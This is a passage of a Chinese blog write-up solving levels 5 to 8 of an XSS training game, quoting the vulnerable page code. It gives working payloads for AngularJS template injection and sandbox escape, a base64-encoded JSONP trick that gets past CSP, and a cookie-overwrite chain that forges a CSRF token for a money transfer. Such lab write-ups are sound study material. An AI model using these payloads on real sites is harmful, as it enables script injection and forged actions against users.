<p>第五关，用到了Angular框架，这个框架的特点是可以用<code>&#123;&#123;1+1&#125;&#125;</code>类似这样的方式执行代码，但是我尝试输入后，发现被html编码了，而且也没有什么地方可以执行，接下来审计代码：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;</span><br><span class="line">      angular.<span class="title function_">module</span>(<span class="string">&#x27;myApp&#x27;</span>, [])</span><br><span class="line">      .<span class="title function_">controller</span>(<span class="string">&#x27;myController&#x27;</span>, [<span class="string">&#x27;$scope&#x27;</span>, <span class="keyword">function</span> (<span class="params">$scope</span>) &#123;</span><br><span class="line">        $scope.<span class="property">query</span> = <span class="string">&quot;&quot;</span>;</span><br><span class="line">        $scope.<span class="property">alert</span> = <span class="variable language_">window</span>.<span class="property">alert</span>;</span><br><span class="line">      &#125;]);</span><br><span class="line"></span><br><span class="line">      <span class="keyword">var</span> <span class="variable constant_">UTM_PARAMS</span> = [<span class="string">&quot;utm_content&quot;</span>, <span class="string">&quot;utm_medium&quot;</span>, <span class="string">&quot;utm_source&quot;</span>,</span><br><span class="line">          <span class="string">&quot;utm_campaign&quot;</span>, <span class="string">&quot;utm_term&quot;</span>]</span><br><span class="line"></span><br><span class="line">      <span class="keyword">if</span> (location.<span class="property">search</span>)</span><br><span class="line">      &#123;</span><br><span class="line">        <span class="keyword">var</span> params = location.<span class="property">search</span>.<span class="title function_">substring</span>(<span class="number">1</span>).<span class="title function_">split</span>(<span class="string">&#x27;&amp;&#x27;</span>);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">for</span> (<span class="keyword">var</span> p <span class="keyword">in</span> params) &#123;</span><br><span class="line">          <span class="keyword">var</span> r = params[p].<span class="title function_">split</span>(<span class="string">&#x27;=&#x27;</span>);</span><br><span class="line"></span><br><span class="line">          <span class="keyword">if</span> (r.<span class="property">length</span> == <span class="number">2</span> &amp;&amp; <span class="variable constant_">UTM_PARAMS</span>.<span class="title function_">indexOf</span>(r[<span class="number">0</span>]) != -<span class="number">1</span>) &#123;</span><br><span class="line">            <span class="keyword">var</span> el = <span class="variable language_">document</span>.<span class="title function_">getElementsByName</span>(r[<span class="number">0</span>]);</span><br><span class="line">            <span class="keyword">if</span> (el.<span class="property">length</span>) el[<span class="number">0</span>].<span class="property">value</span> = <span class="built_in">decodeURIComponent</span>(r[<span class="number">1</span>]);</span><br><span class="line">          &#125;</span><br><span class="line">        &#125;</span><br><span class="line">      &#125;</span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<p>上面代码涉及到UTM解析：UTM参数是在线营销和网站分析中的一个重要工具，它们是一组查询参数，可以附加到URL中，用于追踪和分析营销活动的效果。UTM代表Urchin Tracking Module。<code>location.search</code>是对URL的查询字符串，<code>split(&#39;&amp;&#39;)</code>是把字符串分割成数组，<code>split(&#39;=&#39;)</code>是把数组分割成键值对，<code>decodeURIComponent(r[1])</code>是把编码后的字符串解码，并赋值给el[0]。也就是对参数中的代码作了执行，替换到UTM_PARAMS中某个节点处，则构造payload：<code>?utm_term=&#123;&#123;alert()&#125;&#125;</code>，成功。</p>
<p>第六关，发现和前面的类似，但都尝试了下不行，其实刚才我遇到Angular后第一反应是去搜有没有相应的框架漏洞，这次又检索了下，发现有一个漏洞，满足源代码中引用的版本：1.2.0<br>下面的博客中给出了相应的payload<br><a target="_blank" rel="noopener" href="https://portswigger.net/research/xss-without-html-client-side-template-injection-with-angularjs">https://portswigger.net/research/xss-without-html-client-side-template-injection-with-angularjs</a></p>
<img src="/2024/09/20/WebSecurity/crosssitescripting/image-2.png" class="">
<p>尝试输入，构造参数<code>?query=&#123;&#123;a='constructor';b=&#123;&#125;;a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()&#125;&#125;</code>，直接放在url中没有反应，看了解析说用<code>&amp;lcub;</code>是{的字符实体，<code>&amp;rcub;</code>是}的字符实体。使用这些实体替代原字符可以实现注入。</p>
<p>第七关，这关打开后看到熟悉的CSP，CSP是Content Security Policy的缩写，前两天刚看了。审计代码发现有个关键的level7.js文件，其中内容如下：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">main</span>(<span class="params"></span>) &#123;</span><br><span class="line">    <span class="keyword">var</span> m = location.<span class="property">search</span>.<span class="title function_">match</span>(<span class="string">&#x27;menu=(.*)&#x27;</span>);</span><br><span class="line">    <span class="keyword">var</span> menu = m ? <span class="title function_">atob</span>(m[<span class="number">1</span>]) : <span class="string">&#x27;about&#x27;</span>;</span><br><span class="line">    <span class="variable language_">document</span>.<span class="title function_">write</span>(<span class="string">&#x27;&lt;script src=&quot;jsonp?menu=&#x27;</span> + <span class="built_in">encodeURIComponent</span>(menu) + <span class="string">&#x27;&quot;&gt;&lt;/script&gt;&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * Display stuff returned from server side.</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@param</span> &#123;<span class="type">string</span>&#125; <span class="variable">data</span> - JSON data from server side</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">callback</span>(<span class="params">data</span>) &#123;</span><br><span class="line">    <span class="keyword">if</span> (data.<span class="property">title</span>) <span class="variable language_">document</span>.<span class="title function_">write</span>(<span class="string">&#x27;&lt;h1&gt;&#x27;</span> + data.<span class="property">title</span> + <span class="string">&#x27;&lt;/h1&gt;&#x27;</span>);</span><br><span class="line">    <span class="keyword">if</span> (data.<span class="property">pictures</span>) data.<span class="property">pictures</span>.<span class="title function_">forEach</span>(<span class="keyword">function</span>(<span class="params">url</span>) &#123;</span><br><span class="line">        <span class="variable language_">document</span>.<span class="title function_">write</span>(<span class="string">&#x27;&lt;img src=&quot;/static/img/&#x27;</span> + url + <span class="string">&#x27;&quot;&gt;&lt;br&gt;&lt;br&gt;&#x27;</span>);</span><br><span class="line">    &#125;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="title function_">main</span>();</span><br></pre></td></tr></table></figure>
<p>在其中看到了熟悉的jsonp，jsonp可能会错误接收callback 参数，构造payload：<code>jsonp?callback=1</code>，有正常回显</p>
<img src="/2024/09/20/WebSecurity/crosssitescripting/image-3.png" class="">
<p>接下来想办法插入执行代码，观察url参数是被base64编码后的，随便输入一些尝试下，可以显示在页面，编码后传入<code>&lt;script&gt;alert(1)&lt;/script&gt;</code>（<code>PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==</code>），发现没有正常显示。观察控制台输出：</p>
<img src="/2024/09/20/WebSecurity/crosssitescripting/image-4.png" class="">
<p>因为同源策略被禁止代码执行，这个时候就想到上面的jsonp，利用jsonp执行代码，构造payload <code>&lt;script src=&#39;jsonp?callback=alert();//&#39;&gt;&lt;/script&gt;</code>，编码后：<code>PHNjcmlwdCBzcmM9J2pzb25wP2NhbGxiYWNrPWFsZXJ0KCk7Ly8nPjwvc2NyaXB0Pg==</code>，最终成功执行。</p>
<p>第8关，先走了下流程，大概就是可以set自己的名字，然后可以给别人转账，那么我们的思路就是，给出一个链接，可以set的同时还可以直接转账，首先看下set的内容：<br><code>http://www.xssgame.com/f/d9u16LTxchEi/set?name=name&amp;value=12345&amp;redirect=index</code><br>返回包中<code>Set-Cookie: name=12345; Path=/</code> 和我们设定的一致，看下转钱的包，请求如下：<br><code>http://www.xssgame.com/f/d9u16LTxchEi/transfer?name=31123&amp;amount=123&amp;csrf_token=99DPV595WL</code><br>我们先验证下set，构造payload<code>http://www.xssgame.com/f/d9u16LTxchEi/set?name=csrf_token&amp;value=12345&amp;redirect=index</code>，发现成功set，因为这里的set之后直接就有跳转，那我们直接构造一个转账页面跳转过去执行，因为<code>&amp;</code>会被url解析为参数，所以这里用url编码下<br><code>transfer%3Fname%3D31123%26amount%3D123%26csrf_token%3D12345</code>，直接在控制台执行<code>encodeURIComponent(&#39;transfer?name=31123&amp;amount=123&amp;csrf_token=12345&#39;)</code>即可，到这里是能干坏事了，但还是没有正常执行，发现转账数目错误的情况下会有回显，构造payload如下：<code>transfer?name=31123&amp;amount=%3Cscript%3Ealert()%3C/script%3E&amp;csrf_token=12345</code>。</p>
<h2 id="防范XSS"><a href="#防范XSS" class="headerlink" title="防范XSS"></a>防范XSS</h2><p><a target="_blank" rel="noopener" href="https://segmentfault.com/a/1190000022678120">https://segmentfault.com/a/1190000022678120</a><br><a target="_blank" rel="noopener" href="https://www.cnblogs.com/blbl-blog/p/17188558.html">https://www.cnblogs.com/blbl-blog/p/17188558.html</a></p>

  </div>
</article>

    <div class="blog-post-comments">
        <div id="disqus_thread">
            <noscript>Please enable JavaScript to view the comments.</noscript>
        </div>
    </div>


    <div class="blog-post-comments">
        <div id="utterances_thread">
            <noscript>Please enable JavaScript to view the comments.</noscript>
        </div>
    </div>


        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a href="/search/">Search</a></li>
        
          <li><a href="/categories/">Categories</a></li>
        
          <li><a href="/idea/">Idea</a></li>
        
          <li><a target="_blank" rel="noopener" href="https://github.com/g0dam">Projects</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%A6%82%E5%BF%B5"><span class="toc-number">1.</span> <span class="toc-text">概念</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#XSS%E7%9A%84%E6%94%BB%E5%87%BB%E8%BD%BD%E8%8D%B7"><span class="toc-number">2.</span> <span class="toc-text">XSS的攻击载荷</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#XSS-%E7%BB%95%E8%BF%87%E6%8A%80%E5%B7%A7"><span class="toc-number">3.</span> <span class="toc-text">XSS 绕过技巧</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Eval-%E5%85%B6%E5%AE%83%E5%86%97%E4%BD%99%E7%AC%A6%E5%8F%B7"><span class="toc-number">3.1.</span> <span class="toc-text">Eval &amp; 其它冗余符号</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E9%94%99%E8%AF%AF%E8%BE%93%E5%85%A5%E8%BF%87%E6%BB%A4%E6%9C%BA%E5%88%B6%E5%AE%9E%E7%8E%B0%E7%BB%95%E8%BF%87"><span class="toc-number">3.2.</span> <span class="toc-text">利用错误输入过滤机制实现绕过</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98"><span class="toc-number">4.</span> <span class="toc-text">靶场实战</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%98%B2%E8%8C%83XSS"><span class="toc-number">5.</span> <span class="toc-text">防范XSS</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://g0dam.github.io/2024/09/20/WebSecurity/crosssitescripting/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://g0dam.github.io/2024/09/20/WebSecurity/crosssitescripting/&text=【Web安全】XSS跨站脚本攻击"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://g0dam.github.io/2024/09/20/WebSecurity/crosssitescripting/&title=【Web安全】XSS跨站脚本攻击"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://g0dam.github.io/2024/09/20/WebSecurity/crosssitescripting/&is_video=false&description=【Web安全】XSS跨站脚本攻击"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=【Web安全】XSS跨站脚本攻击&body=Check out this article: https://g0dam.github.io/2024/09/20/WebSecurity/crosssitescripting/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://g0dam.github.io/2024/09/20/WebSecurity/crosssitescripting/&title=【Web安全】XSS跨站脚本攻击"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://g0dam.github.io/2024/09/20/WebSecurity/crosssitescripting/&title=【Web安全】XSS跨站脚本攻击"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://g0dam.github.io/2024/09/20/WebSecurity/crosssitescripting/&title=【Web安全】XSS跨站脚本攻击"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://g0dam.github.io/2024/09/20/WebSecurity/crosssitescripting/&title=【Web安全】XSS跨站脚本攻击"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://g0dam.github.io/2024/09/20/WebSecurity/crosssitescripting/&name=【Web安全】XSS跨站脚本攻击&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://g0dam.github.io/2024/09/20/WebSecurity/crosssitescripting/&t=【Web安全】XSS跨站脚本攻击"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2024
    g0dam
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/categories/">Categories</a></li><!--
     --><!--
       --><li><a href="/idea/">Idea</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/g0dam">Projects</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

    <script type="text/javascript">
        var disqus_shortname = 'cactus-1';

        (function(){
            var dsq = document.createElement('script');
            dsq.type = 'text/javascript';
            dsq.async = true;
            dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        }());
    </script>

<!-- utterances Comments -->

    <script type="text/javascript">
      var utterances_repo = 'owner/githubrepo';
      var utterances_issue_term = 'pathname';
      var utterances_label = 'Comment';
      var utterances_theme = 'github-dark';

      (function(){
          var script = document.createElement('script');

          script.src = 'https://utteranc.es/client.js';
          script.setAttribute('repo', utterances_repo);
          script.setAttribute('issue-term', 'pathname');
          script.setAttribute('label', utterances_label);
          script.setAttribute('theme', utterances_theme);
          script.setAttribute('crossorigin', 'anonymous');
          script.async = true;
          (document.getElementById('utterances_thread')).appendChild(script);
      }());
  </script>

</body>
</html>
